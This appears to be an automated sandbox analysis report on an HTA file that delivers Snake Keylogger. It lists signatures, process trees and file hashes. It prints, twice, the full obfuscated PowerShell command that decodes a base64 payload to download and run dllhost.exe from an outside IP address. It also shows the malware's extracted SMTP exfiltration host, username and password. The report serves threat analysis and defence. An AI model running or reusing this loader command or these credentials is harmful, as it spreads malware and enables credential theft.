Analysis
-
max time kernel
122s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03-10-2024 06:30
Static task
static1
Behavioral task
behavioral1
Sample
IEnetbookupdation.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
IEnetbookupdation.hta
Resource
win10v2004-20240802-en
General
-
Target
IEnetbookupdation.hta
-
Size
115KB
-
MD5
3f20ef35e2f63a4e4f0719740bf9deeb
-
SHA1
6e804455dcf41545ebb533636558481e0da69b8a
-
SHA256
4fde814d5f352592a5b42c856b41548f1517ee82a1c042b882622ace5a6b06f6
-
SHA512
b7f959280d4107fbc3f4e2a646f542e2bb55bcde0840848e81c14e5dbf7fd142af337d85eb045d3c7b8686fa568f9f4df6e76a22378d3b6e653199fb5db9cc65
-
SSDEEP
96:Ea+M7alGgrialG5prPFX7/wZf83kJcAlGo3lGZN5Dr93lGaAT:Ea+QpgWpfRKLeHndaBT
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.kotobagroup.com - Port:
587 - Username:
[email protected] - Password:
Kotoba@2022!
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/3056-29-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/3056-30-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/3056-31-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2336 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2336 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2664 dllhost.exe -
Loads dropped DLL 1 IoCs
pid Process 2336 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000018b03-21.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2664 set thread context of 3056 2664 dllhost.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2336 powershell.exe 2336 powershell.exe 2336 powershell.exe 3056 RegSvcs.exe 3056 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2664 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 3056 RegSvcs.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2108 wrote to memory of 2460 2108 mshta.exe 30 PID 2108 wrote to memory of 2460 2108 mshta.exe 30 PID 2108 wrote to memory of 2460 2108 mshta.exe 30 PID 2108 wrote to memory of 2460 2108 mshta.exe 30 PID 2460 wrote to memory of 2336 2460 cmd.exe 32 PID 2460 wrote to memory of 2336 2460 cmd.exe 32 PID 2460 wrote to memory of 2336 2460 cmd.exe 32 PID 2460 wrote to memory of 2336 2460 cmd.exe 32 PID 2336 wrote to memory of 2644 2336 powershell.exe 33 PID 2336 wrote to memory of 2644 2336 powershell.exe 33 PID 2336 wrote to memory of 2644 2336 powershell.exe 33 PID 2336 wrote to memory of 2644 2336 powershell.exe 33 PID 2644 wrote to memory of 2696 2644 csc.exe 34 PID 2644 wrote to memory of 2696 2644 csc.exe 34 PID 2644 wrote to memory of 2696 2644 csc.exe 34 PID 2644 wrote to memory of 2696 2644 csc.exe 34 PID 2336 wrote to memory of 2664 2336 powershell.exe 37 PID 2336 wrote to memory of 2664 2336 powershell.exe 37 PID 2336 wrote to memory of 2664 2336 powershell.exe 37 PID 2336 wrote to memory of 2664 2336 powershell.exe 37 PID 2664 wrote to memory of 3056 2664 dllhost.exe 38 PID 2664 wrote to memory of 3056 2664 dllhost.exe 38 PID 2664 wrote to memory of 3056 2664 dllhost.exe 38 PID 2664 wrote to memory of 3056 2664 dllhost.exe 38 PID 2664 wrote to memory of 3056 2664 dllhost.exe 38 PID 2664 wrote to memory of 3056 2664 dllhost.exe 38 PID 2664 wrote to memory of 3056 2664 dllhost.exe 38 PID 2664 wrote to memory of 3056 2664 dllhost.exe 38 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\IEnetbookupdation.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWErShELL -EX ByPASS -NOp -w 1 -C deVicECrEdEntiAlDEPloYMeNT.exe ; iEX($(IEx('[sYStEm.text.encODinG]'+[ChAR]0X3A+[CHAr]58+'UTf8.gEtSTrIng([systEM.ConvERT]'+[chaR]58+[ChAr]0X3A+'fromBasE64strIng('+[ChAR]34+'JDdZOVg2a1NJMVUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVSRGVGaU5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cVloakVseixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTWE9XUEtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExSbkZTTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnd6eGdDeU8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU05DQkxtZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktIYmtPb1MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlKUnlETnJlRyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN1k5WDZrU0kxVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjkvNzgwL2RsbGhvc3QuZXhlIiwiJGVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJULVNMZUVwKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[Char]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWErShELL -EX ByPASS -NOp -w 1 -C deVicECrEdEntiAlDEPloYMeNT.exe ; iEX($(IEx('[sYStEm.text.encODinG]'+[ChAR]0X3A+[CHAr]58+'UTf8.gEtSTrIng([systEM.ConvERT]'+[chaR]58+[ChAr]0X3A+'fromBasE64strIng('+[ChAR]34+'JDdZOVg2a1NJMVUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVSRGVGaU5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cVloakVseixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTWE9XUEtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExSbkZTTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnd6eGdDeU8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU05DQkxtZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktIYmtPb1MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlKUnlETnJlRyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN1k5WDZrU0kxVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjkvNzgwL2RsbGhvc3QuZXhlIiwiJGVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJULVNMZUVwKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[Char]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zv2bsxfo.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE11.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDE10.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2696
-
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3056
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50a78b88089baae0963680c2324fcddaa
SHA169ed50e2ed995adfa89de6f170e8fd06cc6140cc
SHA2563506315ab5e536d4c2ea3ab040888cb5c1c6b9c2cc9721aeeb53ecd64d43b2cd
SHA5120858a5ce5e74efc7632f38c45e28811bf97ab300580fa2e822bf355c80e0d2208c8f17a1148af570b9de57e281bacca8d5572b6b68428b7d5d87250732564f0c
-
Filesize
3KB
MD56bd7d99ec6d015083b4ab9efb2dd131d
SHA165d406c9124a564d3f99910c2fa2d4e4267c6b99
SHA256582da1b79956f531c3138c2896228996c87fdf8604569da8b7cd33ebeb129719
SHA5120070742f298890c7b4f0cdaaff96c7952819213660c36181668dd0034ffd4121c655bfb7efce86b1d08bbb6e1ed44600faca0f3e17b9e91a7a4dc275365a049a
-
Filesize
7KB
MD570b46aea48cd7735ef0ede492b05675d
SHA14de3ada5149f78675658f48adfd82c7d232d8ce6
SHA256c3e1b1f710f1d76105b54a3b8aa46e97f0f13caea0adc4dd72dc1ffc8f3df963
SHA512f2d7a18bbd1bed631b1558b33f625dcf06f54b20cb7700ffb0559189546c85ad33396364000d1a5580de4ff6eb068390bd1423e7da7fc214f2359de6b5a65e50
-
Filesize
1008KB
MD546ce226283fb84a52a6a902fc7032363
SHA1c3bb1c73525de62dc7756ad40574ad6c6c148996
SHA2569f3a7c1a4cc7e6e68e610bdce33046edb090a648e362ab8d3df8ba72561e1482
SHA51236ea4f80512c7b20d1c34406b6bdd77f64831c4569d7cb4418d4904dffdb8d33e3b6e4f37fa2b949449c04569bd1f9dc3dd010027de288ab2f8ac9de02d4f34d
-
Filesize
652B
MD5879dc6eae48b34d2838c92d11780ebaa
SHA1bfeddefe2b54177d3c0d98f903611380fb805462
SHA2561bde9d03511f7de85d83c19acb52a0dbc2886638a8fc64f5f9461503c2af983d
SHA51221bb35622e0e9633e2ceeeae56b0142bf367f203035b7f90a74b5c441a5c33e4fab235b69b7a310b634c4fefd5c09039b9870cf258a2a7feeb6b24c344a1fbac
-
Filesize
485B
MD5526cb8f584c9e67eaad8958503b05f30
SHA12c52fac6e929f46dcb4b0cdbeab72cfb806a2c87
SHA256af9253507cbd12a1875ffc8b02988ef5bccc511c7c77614cb34c5115b42c5b76
SHA5125552f12bb883f18c7901a8d873eb1beaab9aa2e06a213ab476ef5a21b00faa69ab438261b7612c7be0cbd3d9f6086a1861c4f28ab3df41969d227eabbe0d9619
-
Filesize
309B
MD5818857d2f664e423733c26205a1099cf
SHA1487a5bb74cde2f4c16a1fadbabc0bc6277133ccb
SHA25615f598ee015d73bcabbdfe5214cf6282398e4641cde36c77c1f63a480f9702ac
SHA512ea47c7faa7a15393947d9c0f6e8912370670cf8f73b8c9802a9dee3d56132a3a038c667090cd3544438f293cca40cdfe94b8f5ec3b80eb82a8c487edabfcc657